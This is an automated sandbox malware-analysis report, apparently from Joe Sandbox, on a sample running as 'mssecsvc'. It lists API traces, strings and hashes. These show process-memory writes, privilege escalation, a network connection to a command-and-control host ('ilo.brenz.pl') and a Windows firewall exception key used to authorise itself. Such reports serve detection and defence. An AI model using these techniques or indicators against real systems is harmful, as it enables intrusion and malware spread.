                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$MappingView
                    • String ID: !$&$&$($@$nr
                    • API String ID: 1961427682-1764398444
                    • Opcode ID: eb0b80b5b8c470231b60263bead1ff73dee7615561cc94aa97259510d45e5100
                    • Instruction ID: 315fdaacc53f250e916f795bf55b2d720170911211425d0255cd73c6d26d1a9a
                    • Opcode Fuzzy Hash: eb0b80b5b8c470231b60263bead1ff73dee7615561cc94aa97259510d45e5100
                    • Instruction Fuzzy Hash: 39823232509309EFDB26CF28C4457B97BBAEF41328F105259D81A4F295D3B69F94CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrcpyW.KERNEL32(?,\BaseNamedObjects\itatVt), ref: 7FEA24BA
                    • lstrlenW.KERNEL32(?), ref: 7FEA24C1
                    • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FEA2516
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 7FEA24B8
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateSectionlstrcpylstrlen
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 2597515329-326862825
                    • Opcode ID: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction ID: bc720c525979b78a484a70c7f2d6f0073f93a57bf06c821743778789892915ba
                    • Opcode Fuzzy Hash: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction Fuzzy Hash: 3D0181B0781344BBF7309B29CC4BF5B7D69DFC1B50F508558F608AE1C4DAB89A0483A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrcpyW.KERNEL32(?,\BaseNamedObjects\itatVt), ref: 00B024BA
                    • lstrlenW.KERNEL32(?), ref: 00B024C1
                    • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00B02516
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 00B024B8
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateSectionlstrcpylstrlen
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 2597515329-326862825
                    • Opcode ID: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction ID: a6b36c100c6e39be156390fa89fde2023c108204abcbae6d9420e1ba9b665d91
                    • Opcode Fuzzy Hash: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction Fuzzy Hash: BA0181B0781344BBF7309B29CC4BF5B7D69DF81B50F508558F608AE1C4DAB89A0483A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 7FEA254B
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: OpenSection
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 1950954290-326862825
                    • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                    • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 7FEA252F: NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                    • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 7FEA25A4
                    • CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,7FEA0815), ref: 7FEA25AC
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Section$CloseHandleOpenView
                    • String ID:
                    • API String ID: 2731707328-0
                    • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction ID: 3cc34a18b6b0f74ef45f64819b33cb598c6401d77195fbf03454f98489c8026e
                    • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction Fuzzy Hash: 9A21F970301646BBDB18DE65CC55FBA7369FF80648F401118E85ABE1D4DBB2BA24C758
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                    • Opcode Fuzzy Hash: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FEA249B
                    • NtWriteVirtualMemory.NTDLL ref: 7FEA24A4
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: MemoryVirtual$ProtectWrite
                    • String ID:
                    • API String ID: 151266762-0
                    • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                    • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                    • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction ID: 599e4210a27b95691828082bf071d632d483ec5813d8a2b375e76b2b2bcd3a21
                    • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction Fuzzy Hash: 6A31F5326006158BEB148E38C94079AB7F2FB84704F10C63CE557FB594D676F6898BC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction ID: 71db59ddb0c02d7c0b1c8ebc760af44018ad34d8210eb367ab0f6b7100c8c3ae
                    • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                    • Instruction Fuzzy Hash: 9A3105326006158BEB148F38C84979AB7E2FB94304F10C67DE556E75C0E675EA8D8BC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction ID: e9407abda7b01ee099ae5da6d0bc1793b46753bc5066851cd70037eb2d558cfc
                    • Opcode Fuzzy Hash: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction Fuzzy Hash: 850128326413455AD721DF38CC88FEDBBA1FBC4334F108365E6544F189D672A2858661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction ID: eb1c831ea65f21a70035da57a9546c4f09495bad17fe78a4ed02a6ea921822dc
                    • Opcode Fuzzy Hash: 0cf41f52040ca5e6b6927679fca8f8038c7771ed2d7cc969bb87da6b112f4972
                    • Instruction Fuzzy Hash: 240164322101456BC720FF28CC89F9EBBE2FBC4334F1083A4F4945B1CACA71E2818A91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                    • WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                    • GetTickCount.KERNEL32 ref: 7FEA41F6
                    • RtlExitUserThread.NTDLL(00000000), ref: 7FEA4322
                    Strings
                    • ilo.brenz.pl, xrefs: 7FEA4056, 7FEA4065
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
                    • API String ID: 3316401344-3637711440
                    • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction ID: 1da76589fb4dd87b5df105d6ae65f4369b8eb418b0376c81cadce6663e0d34e8
                    • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction Fuzzy Hash: 1391EC71508348BEEB229F348859BEE7FAEEF41304F000648E85A9E191C3F66F45DB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(00B03F83), ref: 00B03F8F
                    • WSAStartup.WS2_32(00000101), ref: 00B03FCE
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B04057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B04066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B041B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B041BD
                    • GetTickCount.KERNEL32 ref: 00B041F6
                    • RtlExitUserThread.NTDLL(00000000), ref: 00B04322
                    Strings
                    • ilo.brenz.pl, xrefs: 00B04056, 00B04065
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
                    • API String ID: 3316401344-3637711440
                    • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction ID: be9f3f2cb5a4584904dfda9f87cbf596763b954dc007f93c079e890ba15af356
                    • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                    • Instruction Fuzzy Hash: DA91C9B1618248BAEB319F24881DBEA7FEDEF41300F040588EA5A9E1D1D3F45F45CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3EA9), ref: 7FEA3EB5
                      • Part of subcall function 7FEA3ECC: GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                      • Part of subcall function 7FEA3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                      • Part of subcall function 7FEA3ECC: wsprintfA.USER32 ref: 7FEA3EF7
                      • Part of subcall function 7FEA3ECC: CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                      • Part of subcall function 7FEA3ECC: CloseHandle.KERNEL32(?,9C1F5710), ref: 7FEA3F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    Strings
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 4150863296-3060447344
                    • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction ID: a15a6457230e598bb6ef6cbbffa0e8635eaa4eb844119d8f0639b47af27d7a61
                    • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction Fuzzy Hash: A3A1FF71419348BFEB219F348C49BFA7BACEF41304F004659E84A9E092D6F66F05C7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(00B03EA9), ref: 00B03EB5
                      • Part of subcall function 00B03ECC: GetProcAddress.KERNEL32(00000000,00B03EC0), ref: 00B03ECD
                      • Part of subcall function 00B03ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                      • Part of subcall function 00B03ECC: wsprintfA.USER32 ref: 00B03EF7
                      • Part of subcall function 00B03ECC: CreateThread.KERNEL32(00000000,00000000,00B03691,00000000,00000000), ref: 00B03F40
                      • Part of subcall function 00B03ECC: CloseHandle.KERNEL32(?,9C1F5710), ref: 00B03F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Similarity
                    • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 4150863296-3060447344
                    • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction ID: 0325e283dbc4250fe88c927055e5f8001fb9b26d3385d8c67d8f2a98feeb1885
                    • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                    • Instruction Fuzzy Hash: D0A1DCB1518249BEEB219F248C5EBEA7FECEF42300F044689E9499E0C2D7F05F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                    • wsprintfA.USER32 ref: 7FEA3EF7
                    • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 7FEA3F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                      • Part of subcall function 7FEA3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                      • Part of subcall function 7FEA3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                      • Part of subcall function 7FEA3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                      • Part of subcall function 7FEA3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                      • Part of subcall function 7FEA3405: UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                    Strings
                    • C:,, xrefs: 7FEA3EF6, 7FEA3F08
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA3EDF, 7FEA3EF4, 7FEA3F0B, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FEA3F0C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 541178049-3060447344
                    • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction ID: d9e398f0cb57442fd0ba00def27d3fe33590f3ea382637dc010686527708efc5
                    • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction Fuzzy Hash: 65A10071408348BFEB219F348C49BEA7BACEF81304F004659E84A9E091D7F66F05C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcAddress.KERNEL32(00000000,00B03EC0), ref: 00B03ECD
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                    • wsprintfA.USER32 ref: 00B03EF7
                    • CreateThread.KERNEL32(00000000,00000000,00B03691,00000000,00000000), ref: 00B03F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 00B03F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                      • Part of subcall function 00B03405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B0344A
                      • Part of subcall function 00B03405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B03469
                      • Part of subcall function 00B03405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B03493
                      • Part of subcall function 00B03405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B034A0
                      • Part of subcall function 00B03405: UnmapViewOfFile.KERNEL32(?), ref: 00B034B8
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
